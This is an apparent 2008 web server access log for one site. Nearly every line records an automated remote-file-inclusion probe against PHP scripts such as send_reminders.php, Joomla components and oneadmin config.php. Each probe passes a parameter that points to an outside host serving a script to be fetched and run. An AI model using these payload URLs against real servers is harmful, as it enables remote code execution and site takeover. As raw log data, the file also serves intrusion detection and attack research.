217.26.209.233 - - [03/May/2008:11:46:23 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:46:24 -0700] "GET /send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:46:24 -0700] "GET /logs/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:46:24 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:46:26 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:46:26 -0700] "GET /send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:46:26 -0700] "GET /logs/send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:46:27 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:27 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:28 -0700] "GET /send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:28 -0700] "GET /logs/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:28 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:46:35 -0700] "GET /logs//main.php?sayfa=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:46:35 -0700] "GET //main.php?sayfa=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:46:36 -0700] "GET /logs//main.php?sayfa=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:46:36 -0700] "GET //main.php?sayfa=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:11:46:41 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:11:46:41 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:11:46:41 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:46:44 -0700] "GET //atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:46:44 -0700] "GET /logs//atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:46:44 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.220.202.24 - - [03/May/2008:11:46:53 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:54 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:54 -0700] "GET /send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:54 -0700] "GET /logs/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:54 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:57 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:58 -0700] "GET /send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:58 -0700] "GET /logs/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:58 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:58 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:58 -0700] "GET /send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:59 -0700] "GET /logs/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:46:59 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:00 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:00 -0700] "GET /send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:00 -0700] "GET /logs/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:00 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:02 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:02 -0700] "GET /send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:02 -0700] "GET /logs/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:47:03 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:47:11 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:47:11 -0700] "GET /send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:47:12 -0700] "GET /logs/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:47:13 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:47:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:47:23 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:48:02 -0700] "GET /logs//calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:48:04 -0700] "GET //calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:48:17 -0700] "GET //modules/character_roster/include.php?mod_root=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:48:22 -0700] "GET /logs/access.log/display.php?lang=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:48:22 -0700] "GET /logs/display.php?lang=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:49:32 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:49:32 -0700] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.100.1.157 - - [03/May/2008:11:49:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/XdedzX1212/plugin/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.147.112.169 - - [03/May/2008:11:50:07 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Yahoo Pipes 1.0" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:50:30 -0700] "GET /logs/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.26.209.233 - - [03/May/2008:11:50:30 -0700] "GET /send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:11:50:57 -0700] "GET /logs/access.log/index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:11:51:01 -0700] "GET /index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [03/May/2008:11:51:03 -0700] "GET /logs/index.php?sayfa=http://areairc.t35.com/super/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:51:49 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:51:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:51:49 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:51:49 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:52:14 -0700] "GET /logs/send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.217.6 - - [03/May/2008:11:52:14 -0700] "GET /send_reminders.php?includedir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:52:22 -0700] "GET /logs/access_071223.log//modules/character_roster/include.php?mod_root=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:52:22 -0700] "GET /logs//modules/character_roster/include.php?mod_root=http://www.geocities.com/inkamarsya/cheetos.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:52:47 -0700] "GET /logs/send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
198.151.217.136 - - [03/May/2008:11:52:47 -0700] "GET /send_reminders.php?includedir=http://bgsro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:11:53:20 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:11:53:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:11:53:21 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:53:21 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:53:21 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:53:24 -0700] "GET /logs/access_080225.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:53:24 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /logs/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:24 -0700] "GET /logs/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:25 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:53:25 -0700] "GET /logs/access_080104.log/send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.218.137.36 - - [03/May/2008:11:53:27 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.diabeteszones.com/media/.help/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:53:44 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.19.144.26 - - [03/May/2008:11:53:45 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:53:55 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.18.152.168 - - [03/May/2008:11:54:01 -0700] "GET /logs/access_080223.log//oneadmin/config.php?path[docroot]=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.45 - - [03/May/2008:11:54:03 -0700] "GET /logs//calendar.php?p=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:54:12 -0700] "GET /logs/send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [03/May/2008:11:54:12 -0700] "GET /send_reminders.php?includedir=http://BGSro.go.ro/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:54:39 -0700] "GET /send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.84.2 - - [03/May/2008:11:54:39 -0700] "GET /send_reminders.php?includedir=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:39 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:39 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
203.232.161.40 - - [03/May/2008:11:54:53 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/berek/papi/mami/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:54:54 -0700] "GET /logs//main.php?sayfa=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [03/May/2008:11:54:55 -0700] "GET //main.php?sayfa=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:58 -0700] "GET /logs/access_080213.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
203.232.161.40 - - [03/May/2008:11:54:58 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/berek/papi/mami/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:59 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:59 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:54:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:55:09 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:55:09 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:55:09 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.18.156 - - [03/May/2008:11:55:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.169 - - [03/May/2008:11:55:45 -0700] "GET /logs/access_080201.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:55:49 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:19 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:23 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:23 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:23 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:57 -0700] "GET /logs/access_080228.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [03/May/2008:11:56:58 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:57:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
207.58.131.61 - - [03/May/2008:11:57:14 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
